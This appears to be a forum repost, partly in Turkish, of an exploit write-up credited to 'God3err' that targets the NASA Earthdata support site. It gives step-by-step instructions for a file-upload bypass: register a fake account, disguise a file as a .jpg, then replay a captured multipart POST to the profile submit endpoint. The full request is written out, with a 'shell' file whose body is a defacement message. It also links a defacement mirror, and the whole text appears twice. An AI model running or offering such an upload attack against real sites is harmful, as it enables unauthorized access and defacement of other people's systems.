NASA Submit Upload Exploit
Founder : God3err
1) Open site https://support.earthdata.nasa.gov/
2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST
)
POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n 0\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n
Success
E.g
http://overflowzone.com/mirror/84863/
Video :
Website : god3err.pw
Orijinal Makale : https://cxsecurity.com/issue/WLB-2018080056
Orijinal makaleyi incelerseniz sevinirim)
Founder : God3err
1) Open site https://support.earthdata.nasa.gov/
View hidden content is available for registered users!
2) Create fake account
3) Install Live HTTP Headers and HTTP Requester
4) Open Live HTTP Header and rename index.html.jpg
5) Upload this file
6) Copy POST Request
7) Paste HTTP Requester and POST
) POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit
-----------------------------25505821327763\r\n
Content-Disposition: form-data; name="salutation"\r\n
\r\n 0\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="fullname"\r\n
\r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userorganization"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="userdesignation"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="phone"\r\n
\r\n \r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n
Content-Type: image/jpeg\r\n
\r\n
Exploited By God3err\r\n
NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n
Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n
Success
E.g
http://overflowzone.com/mirror/84863/
Video :
Orijinal Makale : https://cxsecurity.com/issue/WLB-2018080056
Orijinal makaleyi incelerseniz sevinirim
)
Son düzenleme:
